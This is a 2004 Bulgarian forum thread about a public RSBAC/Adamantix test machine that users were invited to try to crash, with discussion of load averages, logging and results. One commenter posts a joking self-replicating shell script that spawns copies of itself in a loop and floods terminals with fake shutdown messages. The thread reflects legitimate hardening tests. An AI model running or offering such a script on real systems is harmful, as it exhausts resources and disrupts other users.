статиите са супер
От: Rumen_Yotov <rumen_yotov __@__ dir__dot__bg>
На: 5-12-2004@15:04 GMT+2
Оценка: 1/НеутраленЗдравейте,
Според мен отдавна трябваше да се появи нещо сериозно за RSBAC.
Поздравления.
Румен
[Отговори на този коментар]
Тестове
От: Н. Антонов <nikola< at >linux-bg__dot__org>
На: 5-12-2004@17:33 GMT+2
Оценка: 1/Неутрален В момента подготвяме тестова машина с инсталиран и настроен RSBAC. До машината ще бъде даден тестов достъп през шел с цел всеки, който проявява интерес, до добие представа за това как изглежда RSBAC в действие.
Разбира се, ще бъде позволено да се стартират всякакви "лоши програмки" с цел да бъде доведена да неработоспособно състояние. Като се има предвид, че не става дума за супер сървър, а за най-прост Celeron 366MHz, 128 MB RAM.
На машината ще има инсталиран Adamantix с ядро 2.4.26 (sec) и всички иващи с проекта подобрения.
Кога ще е онлайн, ще обявим тук. Нека преди това сами проведем съответните тестове;)
Редактиран на: 5-12-2004@17:33
[Отговори на този коментар]
Публичен достъп до тестова машина за всеки
От: Н. Антонов <nikola__at__linux-bg[ точка ]org>
На: 6-12-2004@15:09 GMT+2
Оценка: 1/Неутраленhttp://www.linux-bulgaria.org/archive/2004/Dec/32027.html
[Отговори на този коментар]
РЕ: Публичен достъп до ...
От: the_real_maniac <the __точка__ real __точка__ maniac (a) gmail __точка__ com>
На: 6-12-2004@18:40 GMT+2
Оценка: 1/НеутраленКолко време смятате/смяташ да стои тази машина активна :) / онлайн.
/Лично мнение (по-скоро желание):
- никога да не пада :)
освен при липса на захранване или мрежа/интернет
има усмивчица ,но говоря сериозно ;)
Разбира се зависи от това колко ресурси може/те да заделите ;)
Защото (все пак) и тока се плащ и интернета / макар че се съмнявам аз лично трафика да е голям /. ;)
Благодаря за вниманието ;)
[Отговори на този коментар]
RE: Публичен достъп...
От: Н. Антонов <nikola< at >linux-bg[ точка ]org>
На: 6-12-2004@23:29 GMT+2
Оценка: 1/НеутраленЗа съжаление, няма как машината да си остане постоянно така. Машината ми трябва за работа. Засега експериментът върви интересно, но като цяло имаше само един интересен и оригинален опит за осуетяване на работата на системата. За щастие, всички опитващи се да скапят машината на този етап старателно оставят следи за действията си, така че след това ще можем да протоколираме какво е опитано и кой какво е успял да постигне.
Ако машината издържи до края на седмицата, т.е. петък, спираме експеримента и считаме, че можем да разчитаме на това, което сме направили. Ако не издържи, си взимаме съответната поука.
[Отговори на този коментар]
още 1 опит :)
От: knganchev <knganchev __@__ yahoo__dot__com>
На: 8-12-2004@22:11 GMT+2
Оценка: 1/Неутраленами... :) хайде още един опит и от мен :)
test5@adamantix:~$ w
00:09:12 up 10:54, 4 users, load average: 47.27, 31.49, 14.61
[Отговори на този коментар]
RE: още един опит
От: Н. Антонов <nikola (a) linux-bg[ точка ]org>
На: 9-12-2004@1:38 GMT+2
Оценка: 1/НеутраленЧудесно, но с това не правиш нищо интересно. Самият факт, че си докарал машината до такова състояние, не е означава кой знае какво предвид характеристиките й (366 Mhz, бавен диск). Т.е. това само по себе си не е интересно, но все пак благодарим за опитите:)
[Отговори на този коментар]
натоварване
От: knganchev <knganchev< at >yahoo[ точка ]com>
На: 9-12-2004@8:19 GMT+2
Оценка: 1/Неутраленникой не е искал да правя нещо интересно. не го и твърдя. искаше се да се види дали машината може да бъдe докарана в неработоспособно състояние което беше и направено. мисля че е време за изводи.
колкото до слабата машина - ще я натоваря по същият начин и п4 на 3.4 / 1 гб ддр и т.н. да беше. всичко е въпрос на принцип (ipc).
[Отговори на този коментар]
RE: още един опит
От: Н. Антонов <nikola__at__linux-bg[ точка ]org>
На: 9-12-2004@8:33 GMT+2
Оценка: 1/НеутраленА моля, моля:) Има различни видове натоварване. Това, че си докарал такова load avg, не означава, че машината е неработоспособна. Затова е добре да проверяваш как отговаря на съседната конзола. Има здравословно натоварване, което въпреки високия load avg не пречи на работата;) Разбира се, без забавяне не може, но малко забавяне е далеч от определението неработоспособност.
[Отговори на този коментар]
ре
От: knganchev
На: 9-12-2004@10:40 GMT+2
Оценка: 1/Неутраленвнимателно си изясни дефинициите. точно това означава. на маината имаше пуснат само ssh. цялата работа на системата беше силно забавена.
[Отговори на този коментар]
Относно дефинициите
От: Н. Антонов <nikola__at__linux-bg __точка__ org>
На: 9-12-2004@10:58 GMT+2
Оценка: 1/НеутраленПо начало, едно от нещата, на които много държа, е именно прецизността в дефинициите. Тази машина е проектирана като build host и затова няма логика да работи нещо повече от ssh. Разбира се, хардуерно машината не отговаря на тези изисквания. Целта е да си докажем сами на себе си, че отговаря на тях в софтуерен план, т.е. като концепция, подбор на софтуера и настройка.
Идеята е каквото и да правиш, да не можеш да я докараш до замръзване или необходимост от рестарт, останалото остави на админите;) Тяхна работа е да следят благосъстоянието на системата и да шамаросват непослушните потребители когато и както намерят за добре;)
[Отговори на този коментар]
Някои резултати
От: Н. Антонов <nikola (a) linux-bg__dot__org>
На: 10-12-2004@13:19 GMT+2
Оценка: 1/Неутраленhttp://ftp.logos-bg.net/pub/Nikola/RSBAC_Test
На този адрес публикуваме програмите и скриптовете, с които бе тествана досега системата, както и част от логовете, от които може да се види как RSBAC протоколира събитията, засягащи сигурността. След като обработим и осмислим тази информация, ще можем да напишем и подробен доклад за протичането на експеримента.
[Отговори на този коментар]
Удължаване на теста
От: Н. Антонов <nikola (a) linux-bg[ точка ]org>
На: 10-12-2004@13:22 GMT+2
Оценка: 1/НеутраленПоради завишен интерес към експеримента, който започнахме от началото на седмицата, смятам да оставя машината още няколко дни, докато наистина не ми трябва. В момента за съжаление има само един истински експериментатор, който дори постига частични успехи в резултат на здраво програмиране и имплементиране на оригинални хрумвания и си струва да го оставим да поработи още известно време, за да видим докъде може да стигне;)
Поради проявата на хулиганщина, която явно някои възприемат като форма на хакерство, но тестовите потребители се забранява да ползват мрежа.
[Отговори на този коментар]
Хакер-трепач :)
От: Mitak
На: 12-12-2004@11:09 GMT+2
Оценка: 1/НеутраленЕеее... не това направо ме разби :)
Хакериииии :)
#!/bin/sh
while true ; do
#copy myself to a ~random name & execute
name=./`date | cut -b 18-19`
cp $0 $name
nohup $name &
#and do some damage
for z in * ; do
echo "The system is going down for system halt NOW" | wall
sleep 1
done
done
[Отговори на този коментар]
RE: Хакер-трепач
От: Н. Антонов <nikola (a) linux-bg__dot__org>
На: 12-12-2004@13:12 GMT+2
Оценка: 1/НеутраленАз лично съм фен на такива неща:) Това е проява на чувство за хумор, а чувството за хумор е нещото, което отличава разумния човек от безсловесните животни. Браво на такива майтапчии, които дори на bash могат да напишат виц;)
[Отговори на този коментар]
За тестовете...
От: GigaVolt <gigavolt __@__ abv __точка__ bg>
На: 12-12-2004@16:09 GMT+2
Оценка: 1/НеутраленАз пък съм възхитен от скриптовете които трябва да сринат машината. Явно хората който са ги писали не четаат Линукс-БГ. Нека да прочетът http://www.linux-bg.org/cgi-bin/y/index.pl?page=article&id=advices&key=352271146 и да обърнат внимание кой е автора :)(Б.Р. много хубава статия) Понеже изтеглих всички тестове и ги разгледах, но не открих нищо интересно се чудех дали ще видим някога малко повече информация и код за интересната атака за която се говори толкова много и не се казва нищо :)
[Отговори на този коментар]
RE: За тестовете
От: Н. Антонов <nikola __@__ linux-bg< dot >org>
На: 12-12-2004@16:51 GMT+2
Оценка: 1/НеутраленАми всички тия тестове се чупят като крехки клонки и нито един от тях не върши никаква работа върху тестовата система, която сме пуснали.
[Отговори на този коментар]
Тестът свърши
От: Н. Антонов <nikola (a) linux-bg< dot >org>
На: 12-12-2004@19:18 GMT+2
Оценка: 1/НеутраленЗа съжаление обявяваме, че тестът с машината с отворен достъп свърши. Тази машина наистина ми трябва, а и вече научихме каквото ни е необходимо (Каквото и да означава това;)) Мога само с недомлъвки да спомена, че ни бе демонстрирано нещо интересно и то не от случаен човек, а именно от този, от когото очаквахме.
Иначе благодарим на всички, които се отзоваха и особено на Скелета, който жертва много от времето си за нашия експеримент.
В най-скоро време ще подготвим подробен доклад с историята на експеримента.
[Отговори на този коментар]
резултати?
От: fe0
На: 26-12-2004@19:23 GMT+2
Оценка: 1/Неутраленкакво стана, нали щяхте да публикувате?
[Отговори на този коментар]
RE: резултати?
От: Н. Антонов <nikola __@__ linux-bg< dot >org>
На: 26-12-2004@19:45 GMT+2
Оценка: 1/НеутраленДа, подготвяме лекция по темата за янаурския семинар на Линукс-БГ, така че следете новините. Материалите от лекцията ще бъдат публикувани после онлайн.
[Отговори на този коментар]
Sory
От: cancel <cancel (a) mail __точка__ b>
На: 8-01-2005@23:47 GMT+2
Оценка: 1/Неутраленза предният пост ... късно се сетих да прочета тук
[Отговори на този коментар]